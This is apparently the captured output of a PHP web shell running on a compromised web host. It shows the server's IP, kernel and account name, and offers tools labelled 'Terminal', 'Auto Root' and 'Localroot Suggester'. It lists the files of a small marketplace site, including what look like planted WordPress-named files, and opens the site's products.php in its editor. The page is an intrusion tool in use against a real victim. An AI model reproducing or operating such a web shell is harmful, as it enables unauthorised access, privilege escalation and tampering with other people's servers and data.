Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
abayar /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2026-01-09 22:13
admin
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
assets
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
fast-earn-limited
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
includes
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
uploads
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
user
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
ADMIN_LOGIN.txt
13.54
KB
-rw-r--r--
2025-12-22 19:34
COMPLETION.txt
20.92
KB
-rw-r--r--
2025-12-22 19:22
FEATURES.txt
16.92
KB
-rw-r--r--
2025-12-22 19:13
FIX_DATABASE_ERROR.txt
8.7
KB
-rw-r--r--
2025-12-22 19:37
FIX_UPLOAD_ERROR.txt
10.1
KB
-rw-r--r--
2025-12-22 19:45
INSTALLATION.txt
8.73
KB
-rw-r--r--
2025-12-22 19:12
PROJECT_STATUS.txt
12.33
KB
-rw-r--r--
2025-12-22 19:14
QUICK_START.txt
14.12
KB
-rw-r--r--
2025-12-22 19:15
README.md
10.54
KB
-rw-r--r--
2025-12-22 19:11
V2_UPGRADE_NOTES.txt
5.88
KB
-rw-r--r--
2025-12-22 20:04
checkout.php
16.2
KB
-rw-r--r--
2026-01-07 16:26
contact.php
6.71
KB
-rw-r--r--
2026-01-07 16:36
create_folders.php
2.91
KB
-rw-r--r--
2025-12-22 19:44
database.sql
9.14
KB
-rw-r--r--
2025-12-22 19:52
full_setup.php
29.74
KB
-rw-r--r--
2026-01-26 16:55
index.php
30.43
KB
-rw-r--r--
2026-01-07 16:56
login.php
8.83
KB
-rw-r--r--
2025-12-30 13:45
logout.php
151
B
-rw-r--r--
2025-12-22 19:01
products.php
4.69
KB
-rw-r--r--
2026-01-07 16:39
register.php
14.14
KB
-rw-r--r--
2025-12-30 13:25
seed_products.php
559
B
-rw-r--r--
2026-01-07 16:15
update_database.sql
781
B
-rw-r--r--
2025-12-22 19:36
update_db.php
4.07
KB
-rw-r--r--
2025-12-22 19:36
update_db_v10.php
816
B
-rw-r--r--
2025-12-24 21:22
update_db_v11.php
681
B
-rw-r--r--
2025-12-24 21:53
update_db_v12.php
590
B
-rw-r--r--
2026-01-07 16:12
update_db_v2.php
2.13
KB
-rw-r--r--
2025-12-22 19:53
update_db_v3.php
2.76
KB
-rw-r--r--
2025-12-22 20:05
update_db_v4.php
1.43
KB
-rw-r--r--
2025-12-22 20:11
update_db_v5.php
1.9
KB
-rw-r--r--
2025-12-23 19:11
update_db_v6.php
1.91
KB
-rw-r--r--
2025-12-23 19:29
update_db_v7.php
3.05
KB
-rw-r--r--
2025-12-23 19:33
wp-blog-header.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
<?php require_once 'includes/config.php'; $page_title = 'Product Marketplace'; // Fetch active products try { $stmt = $pdo->prepare("SELECT * FROM products WHERE status = 'active' ORDER BY created_at DESC"); $stmt->execute(); $products = $stmt->fetchAll(); } catch (PDOException $e) { $products = []; } include 'includes/public_header.php'; ?> <style> .products-hero { padding: 160px 8% 60px; text-align: center; background: radial-gradient(circle at center, rgba(0, 255, 163, 0.05) 0%, transparent 70%); overflow-x: hidden; width: 100%; } .products-grid { display: grid; grid-template-columns: repeat(auto-fill, minmax(280px, 1fr)); gap: 30px; padding: 60px 8% 100px; overflow-x: hidden; width: 100%; } .product-card { background: var(--card); border: 1px solid var(--border); border-radius: 24px; overflow: hidden; transition: 0.3s; display: flex; flex-direction: column; } .product-card:hover { transform: translateY(-10px); border-color: var(--p); box-shadow: 0 20px 40px rgba(0, 0, 0, 0.4); } .product-img { width: 100%; height: 240px; object-fit: cover; border-bottom: 1px solid var(--border); } .product-info { padding: 25px; flex-grow: 1; display: flex; flex-direction: column; } .product-price { font-size: 24px; font-weight: 800; color: var(--p); margin-bottom: 5px; font-family: 'Outfit', sans-serif; } .product-name { font-size: 20px; font-weight: 700; margin-bottom: 15px; color: #fff; } .product-desc { color: var(--dim); font-size: 14px; line-height: 1.6; margin-bottom: 25px; display: -webkit-box; -webkit-line-clamp: 3; -webkit-box-orient: vertical; overflow: hidden; } .btn-purchase { margin-top: auto; background: rgba(255, 255, 255, 0.05); border: 1px solid var(--border); color: #fff; padding: 14px; border-radius: 12px; text-align: center; text-decoration: none; font-weight: 700; transition: 0.3s; display: flex; align-items: center; justify-content: center; gap: 10px; } .product-card:hover .btn-purchase { background: var(--p); color: #000; border-color: var(--p); } @media (max-width: 768px) { .products-hero { padding: 120px 5% 40px; } .products-grid { padding: 40px 5% 80px; gap: 20px; } } </style> <section class="products-hero"> <div class="section-header" data-aos="fade-up"> <h1>Digital <span>Marketplace</span></h1> <p>Premium digital assets and physical products curated for our exclusive community. Experience excellence with every purchase.</p> </div> </section> <section class="products-grid"> <?php if (empty($products)): ?> <div style="grid-column: 1/-1; text-align: center; padding: 100px 0;"> <i class="fas fa-box-open" style="font-size: 60px; color: var(--dim); margin-bottom: 20px; display: block;"></i> <h3 style="color: var(--dim);">No products available at the moment.</h3> <p style="color: var(--dim);">Check back later for new arrivals.</p> </div> <?php else: ?> <?php foreach ($products as $index => $product): ?> <div class="product-card" data-aos="fade-up" data-aos-delay="<?php echo $index * 50; ?>"> <img src="uploads/products/<?php echo $product['image']; ?>" alt="<?php echo htmlspecialchars($product['name']); ?>" class="product-img"> <div class="product-info"> <div class="product-price"><?php echo formatCurrency($product['price']); ?></div> <div class="product-name"><?php echo htmlspecialchars($product['name']); ?></div> <div class="product-desc"><?php echo htmlspecialchars($product['description']); ?></div> <a href="checkout.php?id=<?php echo $product['id']; ?>" class="btn-purchase"> <i class="fas fa-shopping-cart"></i> Buy Now </a> </div> </div> <?php endforeach; ?> <?php endif; ?> </section> <?php include 'includes/public_footer.php'; ?>